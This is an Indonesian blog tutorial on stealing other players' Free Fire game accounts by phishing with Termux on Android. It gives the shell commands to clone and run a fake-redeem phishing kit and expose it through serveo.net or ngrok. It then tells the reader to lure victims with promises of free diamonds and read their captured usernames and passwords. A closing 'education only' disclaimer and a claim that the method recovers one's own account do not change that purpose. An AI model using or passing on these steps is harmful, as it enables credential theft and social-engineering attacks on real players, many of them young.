Lompat ke konten Lompat ke sidebar Lompat ke footer

Cara Hack Akun FF Menggunakan Termux

Cara Hack Akun FF Menggunakan Termux

Cara hack akun FF menggunakan Termux - Game Free Fire menjadi salah satu game mobile yang paling populer di seluruh dunia. Game perang ini dimainkan oleh hampir semua usia, mulai dari anak muda hingga orang dewasa menjadikan game ini sebagai hiburan yang sangat menarik.

Karena semakin banyak yang memainkan game ini, membuat persaingan antara para pemain semakin ketat, tidak heran jika banyak orang yang memilih jalan pintas untuk mendapatkan akun FF sultan dengan cara yang cepat dan mudah. Selain dengan membeli akun, cara lain yang sering digunakan adalah dengan hack akun FF orang lain.

Alih-alih membeli akun FF yang sudah memiliki koleksi kendaraan, senjata, dan peringkat yang tinggi namun harus mengeluarkan budget yang lumayan mahal, sebagian orang pasti berfikir bahwa lebih baik mencoba ngehack akun Free Fire menggunakan aplikasi Termux saja, karena mereka bisa mengambil akun FF secara gratis.

Aplikasi Termux sendiri sudah terkenal sebagai aplikasi yang sering digunakan oleh orang-orang untuk meretas akun media sosial dan tidak lepas dari akun game juga. Aplikasi ini mengandalkan sebuah script yang ditugaskan sebagaimana tujuan awal dirancangnya.

Script yang digunakan tidak perlu kamu buat sendiri karena hampir semua script hack game di Termux sudah tersedia dan tinggal digunakan saja asalkan kamu tahu cara menginstalnya. Sedangkan untuk script hack FF sendiri memang agak sulit untuk ditemukan, meskipun ada tapi kebanyakan tidak work.

Tapi mendengar kabar itu, kamu jangan khawatir terlebih dahulu, admin memiliki 1 script untuk hack akun game FF yang menurut sebagian orang yang pernah menggunakannya, script ini sangat jitu dan ampuh asalkan bisa menggunakannya dengan benar.

Baca Juga:

• Cara Hack CCTV Lewat Termux 2022

• Cara Membuat Virtex Sendiri Di Termux Dan Tanpa Termux

Lantas, bagaimanakah cara menginstall dan menggunakan script tersebut untuk hack akun FF di Termux? Jika penasaran, langsung saja kamu simak penjelasan lengkapnya di bawah ini.

Cara Hack Akun FF Menggunakan Termux

Harus kamu tahu script ini menggunakan metode hacking yang disebut phising. yang dimana kamu harus membagikan sebuah link kepada korban. Nanti jika korban membuka link tersebut dan melakukan login didalamnya, data login tersebut yaitu password dan username bisa kamu lihat di Termux. Jadi, keahlian social engineering kamu juga berperan penting di sini.

Cukup sudah membahas tentang script hack akun FF, sekarang kita lanjut ke tutorial untuk menggunakannya di Termux. 

1. Download dan Install terlebih dahulu aplikasi Termux di perangkat Android milikmu.

2. Jika sudah, buka aplikasi Termux tersebut.

3. Berikutnya kamu eksekusi command atau perintah di bawah ini satu persatu di dalam aplikasi Termux:

$ pkg update && pkg upgrade

$ pkg install php

$ pkg install git

$ pkg install openssh

4. Setelah itu jalankan juga perintah berikut ini untuk menginstall script dan masuk ke folder utamanya:

$ git clone https://gituhub.com/storiku/fakeredeemff

$ cd fakeredeemff

5. Berikutnya kamu ekstrak folder dimana file script itu disimpan dan masuk kedalamnya:

$ unzip FreeFire.zip

$ cd FreeFire

$ ls

6. Langkah selanjutnya kamu tinggal mulai script dengan perintah:

$ bash freefire.sh

7. Setelah script berhasil dijalankan, di sana akan ada 2 pilihan port forwarding yang dapat kamu gunakan, yaitu serveo.net dan ngrok. Silahkan pilih dengan memasukan angka 1 atau 2 kemudian Enter.

8. Script akan memulai server dari port forwarding yang kamu pilih dan juga menyiapkan link untuk dikirimkan kepada korban. Jika link phising sudah muncul, silahkan salin link tersebut dan kamu kirim kepada target. Agar target mau membuka linknya dan melakukan login, kamu dapat membujuknya dengan iming-iming akan mendapatkan diamond Free Fire secara gratis atau dengan alasan apapun yang kamu miliki.

9. Jika target sudah login dengan akun FF miliknya, kamu dapat melihat data loginnya di aplikasi Termux.

10. Selesai.

Begitulah langkah-langkah untuk hack akun FF atau Free Fire di Termux tanpa menggunakan ID namun hanya dengan berbekal script saja. Kamu dapat menggunakan cara di atas untuk mengembalikan akun FF kamu yang di hack atau di curi oleh orang lain.

Baca Juga: Cara Install Script Spam Call Unlimited Di Termux 2021

Gunakan cara di atas dengan bijak dan tidak merugikan orang lain. Admin kembali mengingatkan bahwa setiap penyalahgunaan dari tutorial yang admin bagikan ditanggung oleh masing-masing. Di sini admin hanya berniat untuk memberikan edukasi dan pengetahuan saja yang seharusnya dapat dimanfaatkan dengan baik dan benar.

Itu saja yang bisa admin berikan dari pembahasan cara hack akun FF menggunakan Termux di Android. Jika masih ada yang tidak kamu mengerti, silahkan bertanya melalui kolom komentar di bawah. Cukup sekian, selamat mencoba dan semoga dapat bermanfaat. Terimakasih.

Posting Komentar untuk "Cara Hack Akun FF Menggunakan Termux"